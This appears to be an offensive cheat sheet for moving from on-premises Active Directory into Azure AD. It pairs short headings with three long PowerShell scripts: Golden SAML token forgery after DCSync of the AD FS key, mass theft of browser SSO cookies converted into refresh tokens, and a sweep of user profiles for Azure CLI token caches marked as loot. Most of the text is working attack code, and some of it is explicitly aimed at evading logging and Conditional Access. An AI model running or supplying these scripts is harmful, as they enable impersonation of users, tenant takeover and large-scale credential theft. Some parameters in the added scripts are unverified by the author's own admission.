On-Prem → Cloud

Dumping AAD Connect Creds

Tools

Forging AD FS SAML Tokens (Golden SAML)

Install AADInternals v0.9.3:

Check whether Azure AD is configured as a relying party trust:

Get AD FS config:

Get the object GUID of the DKM key object (the AD contact object under CN=ADFS,CN=Microsoft,CN=Program Data whose thumbnailPhoto attribute holds the key that encrypts the AD FS private keys):

Ensure you have enough privileges to DCSync:

DCSync the key:

Clear-text credentials are not actually needed to replicate the key if a privileged TGT has already been imported into the current logon session, so the $Credentials parameter (see DRS_Utils.ps1 in C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3) can be omitted.

Decrypt and export the token-signing certificate (PFX):

Get the AD FS issuer (the Federation Service identifier Azure AD expects in the token) and the target on-prem users' ImmutableIDs:

Generate a forged SAML token for the WS-Federation (SOAP-based) protocol exchange:

Generate a forged SAML token for the SAML 2.0 (XML-based) protocol exchange:

Generate a forged SAML token, impersonate the user and log in:
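The whole procedure above as one script. This is an added example, not code from the original page or from the AADInternals documentation; it uses AADInternals 0.9.3 plus the built-in ADFS and ActiveDirectory modules. The host and account names (sts.corp.local, dc01.corp.local, corp.local, j.doe) are placeholders, the remote DCSync variant is kept as commented-out lines because its parameter names are given from memory and should be confirmed with Get-Help, and the SAML 2.0 variant the page lists separately is not shown.

```powershell
# Added example (not the page's own code). Golden SAML against Azure AD with AADInternals 0.9.3.
# Placeholders: AD FS server sts.corp.local, DC dc01.corp.local, domain corp.local, victim j.doe.
Install-Module AADInternals -RequiredVersion 0.9.3 -Scope AllUsers -Force
Import-Module AADInternals
Import-Module ADFS              # available on the AD FS server itself
Import-Module ActiveDirectory   # RSAT

# 1. Is Azure AD a relying party of this farm? Its RP identifier is fixed: urn:federation:MicrosoftOnline.
#    No match means the tenant is not federated here and there is nothing to forge tokens for.
$rp = Get-AdfsRelyingPartyTrust | Where-Object { $_.Identifier -contains 'urn:federation:MicrosoftOnline' }
if (-not $rp) { throw 'Azure AD is not a relying party of this AD FS farm' }
$rp | Select-Object Name, Enabled, Identifier

# 2. Issuer that Azure AD expects in the assertion = the Federation Service identifier.
$issuer = (Get-AdfsProperties).Identifier   # e.g. http://sts.corp.local/adfs/services/trust

# 3. Configuration, DKM key and certificates, read locally on the AD FS server (local admin needed).
$config = Export-AADIntADFSConfiguration -Local
$dkmKey = Export-AADIntADFSEncryptionKey -Local -Configuration $config
Export-AADIntADFSCertificates -Configuration $config -Key $dkmKey   # writes ADFS_signing.pfx and ADFS_encryption.pfx

#    Remote variant from any domain host: the config needs the AD FS service account's NT hash and SID,
#    the DKM key needs replication rights on the DC (DCSync). The key lives in the thumbnailPhoto attribute
#    of a contact object under CN=ADFS,CN=Microsoft,CN=Program Data; if several exist, the displayName of the
#    CryptoPolicy object names the current one. Parameter names from memory; verify with Get-Help.
# $config  = Export-AADIntADFSConfiguration -Hash <svcNtHash> -SID <svcSid> -Server sts.corp.local
# $dkmGuid = (Get-ADObject -LDAPFilter '(objectClass=contact)' -SearchBase 'CN=ADFS,CN=Microsoft,CN=Program Data,DC=corp,DC=local' -Properties thumbnailPhoto |
#             Where-Object thumbnailPhoto).ObjectGUID
# $dkmKey  = Export-AADIntADFSEncryptionKey -Server dc01.corp.local -ObjectGuid $dkmGuid   # -Credentials omitted: TGT already in session

# 4. ImmutableID of the victim. With the default sourceAnchor it is the base64 of the on-prem objectGUID;
#    tenants anchored on mS-DS-ConsistencyGuid carry the value in that attribute instead.
$u = Get-ADUser -Identity j.doe -Properties objectGUID, 'mS-DS-ConsistencyGuid'
$anchor = if ($u.'mS-DS-ConsistencyGuid') { [byte[]]$u.'mS-DS-ConsistencyGuid' } else { $u.objectGUID.ToByteArray() }
$immutableId = [Convert]::ToBase64String($anchor)

# 5. Mint the token with the stolen signing key and redeem it. From here on nothing touches the AD FS
#    server, so AD FS itself logs no token issuance (event 1200) for j.doe.
$saml = New-AADIntSAMLToken -ImmutableID $immutableId -Issuer $issuer -PfxFileName .\ADFS_signing.pfx
Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache
Get-AADIntTenantDetails   # answered with the cached token: proof the forged identity is accepted

# Browser session as the victim (WS-Federation sign-in through login.microsoftonline.com).
Open-AADIntOffice365Portal -ImmutableID $immutableId -Issuer $issuer -PfxFileName .\ADFS_signing.pfx
```

Because the token is signed offline, the AD FS server never sees the sign-in; the practical detection is correlating Azure AD sign-in events that cite the federated issuer against the AD FS audit log (event 1200, token issued) and flagging sign-ins with no matching issuance.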

Refresh Token from ESTSAuth* Cookies

Automated with TokenTacticsV2:

Mass Cookies Harvesting

Collect with dploot and decrypt with the domain DPAPI backup key (the same approach HEKATOMB uses):

Search for ESTSAUTHPERSISTENT cookies:
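The harvesting and the refresh-token exchange chained together, as an added example that is not code from the original page, from dploot or from TokenTacticsV2. Assumed: domain corp.local with tenant domain corp.onmicrosoft.com, DC dc01.corp.local, a Domain Admin da.admin, hosts.txt with one workstation per line, dploot on PATH and TokenTacticsV2 cloned to .\TokenTacticsV2. The dploot flags (-outputfile, -pvk, -show-cookies), its output layout, and the return shapes of the TokenTacticsV2 functions (.refresh_token, .access_token) are as I recall them; check dploot browser -h and the module source before relying on the parsing.

```powershell
# Added example (not the page's own code): sweep workstations for ESTSAUTHPERSISTENT cookies,
# then turn every cookie into a refresh token. Placeholder names throughout.
$domain = 'corp.local'; $tenant = 'corp.onmicrosoft.com'
$user = 'da.admin'; $pass = 'Passw0rd!'

# 1. Domain DPAPI backup key (Domain Admin). It decrypts every domain user's DPAPI master keys and
#    therefore their browser cookie stores, with no need for any user's password.
dploot backupkey -d $domain -u $user -p $pass -outputfile key.pvk "dc01.$domain"

# 2. Dump browser secrets per host, keeping only lines that name the persistent SSO cookie.
#    ESTSAUTHPERSISTENT exists only where the user chose "Stay signed in"; ESTSAUTH alone is
#    session-scoped and gone once the browser closes.
$hits = foreach ($h in Get-Content .\hosts.txt) {
    dploot browser -d $domain -u $user -p $pass -pvk key.pvk -show-cookies $h 2>$null |
        Select-String 'ESTSAUTHPERSISTENT' |
        ForEach-Object { [pscustomobject]@{ Host = $h; Line = $_.Line } }
}
$hits | Export-Csv .\cookies.csv -NoTypeInformation

# 3. Cookie values: whatever follows the name and a separator (format assumed), restricted to the
#    base64url-plus-dot alphabet Azure AD uses, de-duplicated across hosts.
$cookies = $hits.Line | ForEach-Object {
    if ($_ -match 'ESTSAUTHPERSISTENT\W+([A-Za-z0-9._-]+)') { $Matches[1] }
} | Sort-Object -Unique

# 4. A cookie is a live web session with login.microsoftonline.com. TokenTacticsV2 replays it through
#    the OAuth authorization-code flow; the refresh token it returns outlives the cookie.
Import-Module .\TokenTacticsV2\TokenTactics.psd1
$results = foreach ($c in $cookies) {
    try {
        $tok    = Get-AzureTokenFromESTSCookie -ESTSAuthCookie $c
        $graph  = RefreshTo-MSGraphToken -refreshToken $tok.refresh_token -domain $tenant
        $claims = Parse-JWTtoken -token $graph.access_token   # decoded, not verified: only for attribution
        [pscustomobject]@{ Upn = $claims.upn; Tenant = $claims.tid; RefreshToken = $tok.refresh_token }
    } catch {
        Write-Warning "cookie rejected: $($_.Exception.Message)"   # expired, revoked, or blocked by Conditional Access
    }
}
$results | Export-Csv .\refresh-tokens.csv -NoTypeInformation
$results | Format-Table Upn, Tenant
```

Keep the refresh tokens rather than the cookies: Azure AD may refuse a cookie replayed from a new IP or device under Conditional Access, and the error path above is where that shows up, whereas a refresh token already issued keeps working until it is revoked.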

Mass Hidden Directories Searching

Impacket's smbclient.py extension (searches for hidden directories in every user's home):

Collect hidden directories:

Search for hidden directories that start with .az:
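The same sweep done over the admin share from PowerShell, as an added example; it is not the smbclient.py extension the page refers to. It goes slightly beyond the page by catching both Windows-hidden directories and dot-prefixed ones (a `.azure` folder created by the Azure CLI does not necessarily carry the hidden attribute), and by listing the files inside matching directories that are worth taking. Assumed: hosts.txt with one hostname per line and a session that already holds admin rights on the targets.

```powershell
# Added example (not the page's own code): inventory hidden / dot-prefixed directories in every
# user profile reachable over C$, and flag the ones matching a pattern (default .az*).
function Find-HiddenProfileDirs {
    param(
        [string[]] $ComputerName,
        [string]   $Match = '.az*'   # Azure CLI keeps its state in %USERPROFILE%\.azure
    )
    foreach ($h in $ComputerName) {
        # -Force includes hidden profiles too (Default, Public), which is intended
        $profiles = Get-ChildItem -LiteralPath "\\$h\C$\Users" -Directory -Force -ErrorAction SilentlyContinue
        foreach ($p in $profiles) {
            Get-ChildItem -LiteralPath $p.FullName -Directory -Force -ErrorAction SilentlyContinue |
                Where-Object { ($_.Attributes -band [IO.FileAttributes]::Hidden) -or $_.Name.StartsWith('.') } |
                ForEach-Object {
                    [pscustomobject]@{
                        Host    = $h
                        Profile = $p.Name
                        Dir     = $_.Name
                        Path    = $_.FullName
                        Flagged = $_.Name -like $Match
                    }
                }
        }
    }
}

$all = Find-HiddenProfileDirs -ComputerName (Get-Content .\hosts.txt)
$all | Export-Csv .\hidden-dirs.csv -NoTypeInformation    # full inventory, not just the .az* hits
$az  = $all | Where-Object Flagged

# Inside a .azure directory: azureProfile.json is clear text (tenant, subscriptions, signed-in user);
# the MSAL cache holds the refresh/access tokens. On Windows msal_token_cache.bin is DPAPI-protected
# with the profile owner's master key, so it is decrypted the same way as browser cookies;
# older CLI builds left accessTokens.json in clear text.
$loot = 'azureProfile.json', 'accessTokens.json', 'msal_token_cache.bin', 'msal_token_cache.json'
foreach ($d in $az) {
    Get-ChildItem -LiteralPath $d.Path -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -in $loot } |
        Select-Object @{n='Host';e={$d.Host}}, @{n='Profile';e={$d.Profile}}, Name, Length, LastWriteTime
}
```

Run it with a Domain Admin TGT in the session; per-host failures (host offline, C$ disabled, access denied) are swallowed by -ErrorAction SilentlyContinue so one dead host does not stop the sweep.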
